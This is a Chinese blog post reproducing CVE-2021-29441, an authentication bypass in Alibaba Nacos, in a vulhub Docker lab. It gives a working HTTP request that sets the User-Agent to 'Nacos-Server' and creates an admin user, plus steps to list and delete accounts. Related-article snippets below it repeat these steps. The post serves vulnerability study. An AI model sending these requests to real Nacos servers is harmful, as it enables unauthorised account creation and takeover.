Alibaba Nacos权限认证绕过漏洞[CVE-2021-29441]

最新推荐文章于 2024-06-20 14:41:28 发布
最新推荐文章于 2024-06-20 14:41:28 发布
阅读量1.1k 收藏 1
点赞数
文章标签: 网络安全 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54323635/article/details/132601647
版权

1 漏洞原理

Alibaba Nacos是阿里巴巴的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞是Nacos在进行认证授权操作时,会先判断user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。利用这个未授权漏洞,攻击者可以未授权获取到用户名密码,添加用户,并且删除用户等敏感信息。威胁程度较高。

2 环境搭建

cd  /vulhub-master/nacos/CVE-2021-29441
docker-compose up -d

3 漏洞复现

1.1外网查看用户账号信息

访问http://ip:端口号/nacos/v1/auth/users/?pageNo=1&pageSize=10

 

1.2添加任意用户

访问http://ip:端口号/nacos/v1/auth/users,抓取数据包,将GET请求在burpsuite中改成POST请求,将User-Agent改为Nacos-Server 添加表单username=用户名&password=用户密码。

添加成功!

poc如下:

POST /nacos/v1/auth/users HTTP/1.1
Host: your-IP:8848
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=admin&password=admin

这里添加admin用户,发送数据包,响应包返回200,说明添加用户成功。

 

尝试使用刚才创建的账号进行登录!

登陆成功!         

 

1.2删除任意用户!

先通过访问http://ip:端口号/nacos/v1/auth/users/?pageNo=1&pageSize=10

来查看当前有哪些用户!

 

尝试删除用户test。

访问http://ip:端口号/nacos/v1/auth/users?username=用户名,抓取数据包,将GET请求改成DELETE请求,将User-Agent改为Nacos-Server。

 登陆验证test用户是否删除了!访问http://your-ip:8848/nacos/#/login test 123456

 

成功删除了该用户!

漏洞复现完毕!

yao阿土
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Alibaba Nacos权限认证绕过漏洞复现
逍遥小哥的博客
07-18 6574
是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和。2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。为什么会产生这个漏洞?1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证
你的Nacos还在裸奔吗?Nacos权限绕过漏洞
码猿技术专栏
11-14 6999
大家好,我是不才陈某~目前nacos越来越广泛,大多数的企业在使用微服务架构的时候,基本上都会选择nacos作为注册中心和配置中心。那nacos其实也是阿里开源的一个项目,存在漏洞,至少难免的。那我们今天就来分享一下nacos存在的漏洞问题,主要是一些安全漏洞的问题。毕竟现在很多政务的项目,都会做等保测试这块。等保做得多了,漏洞也就多了。这不,今天就又有一个漏洞了。那就开始修复喽!!!1.naco...
Nacos漏洞总结复现
最新发布
喜欢Python编程的程序员柚柚呀
06-20 485
Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户 0x01 漏洞影响 0.1.0 <= Nacos <= 2.2.0 0x02 漏洞搜索 fofa:app=“NACOS” 0x03 漏洞复现 在nacos中,token.secret.key值是固定死的,位置在conf下的appli
留后门?Nacos被爆存在严重的旁路身份验证安全漏洞
xmt1139057136的专栏
01-16 1705
留后门?Nacos被爆存在严重的旁路身份验证安全漏洞2021 年 1 月 15 日,也就是昨天,Nacos 发布了新版本 1.4.1。该版本发布了很多新特性和增强的功能。这次发布的新版...
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效
majunssz的博客
04-22 1万+
解决Alibaba Nacos 权限认证绕过漏洞 (CVE- - 2021- - 29441)亲测有效 2.可以通过外网随意添加nacos用户名及密码
认证绕过NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6731
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
Nacos认证绕过漏洞CVE-2021-29441
tpaer的博客
12-16 2018
复现Nacos认证绕过漏洞,导致未授权的任意访问。
漏洞复现 - - - Alibaba Nacos权限认证绕过
weixin_67503304的博客
08-03 5043
Alibaba Nacos权限认证绕过Max HackBar方式进行POST传参,简单易懂,操作方便。
nacos未授权-CVE-2021-29441复现
crowsec
07-21 7816
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos 存在认证绕过漏洞CVE-2021-29441
北方的孤夜
06-04 1848
Nacos 存在认证绕过漏洞CVE-2021-29441
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞
weixin_63580357的博客
11-06 276
访问http://ip:端口号/nacos/v1/auth/users,抓取数据包,将GET请求在burpsuite中改成POST请求,将User-Agent改为Nacos-Server 添加表单username=用户名&password=用户密码。pageNo=1&pageSize=9获取已有的用户列表。1.访问http://ip:端口号/nacos/v1/auth/users/?5. 访问http://target:8848/nacos/,使用添加的新用户(vulhub/vulhub)进行登录。
Nacos 认证绕过漏洞CVE-2021-29441
gaomei2009的专栏
06-20 635
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。
NACOS漏洞问题及修复(CVE-2021-29441)
热门推荐
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
Alibaba Nacos 权限认证绕过漏洞
ggboy的博客
05-30 675
可能泄露敏感信息并被攻击者利用造成威胁;攻击者可能直接利用样例的 漏洞进行攻击;核心数据可能被偷取。nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 构造payload后访问抓取数据包,将数据包GET改为POST请求进行添加新用户test 登录test用户,可以查看用户信息,存在垂直越权漏洞 查看isuse问题描述找到官方配置
Nacos权限绕过漏洞(CVE-2021-29441)复现
2301_76437855的博客
04-14 2766
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。
Nacos漏洞修复】Nacos未授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 7163
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
Nacos权限认证绕过漏洞CVE-2021-29441)虚拟机环境下复现
weixin_44656518的博客
08-09 488
nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名密码等敏感信息。该漏洞的原因是开发者将协商好的user-agent设置为"Nacos-Server",直接硬编码在了代码里,导致了漏洞的出现。攻击者可以通过发送特定的请求,来添加一个新用户,账号密码都为vulhub,然后使用新建的账号进行登录,从而绕过认证。在漏洞利用过程中,只需要用到nacosweb访问端口8848。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值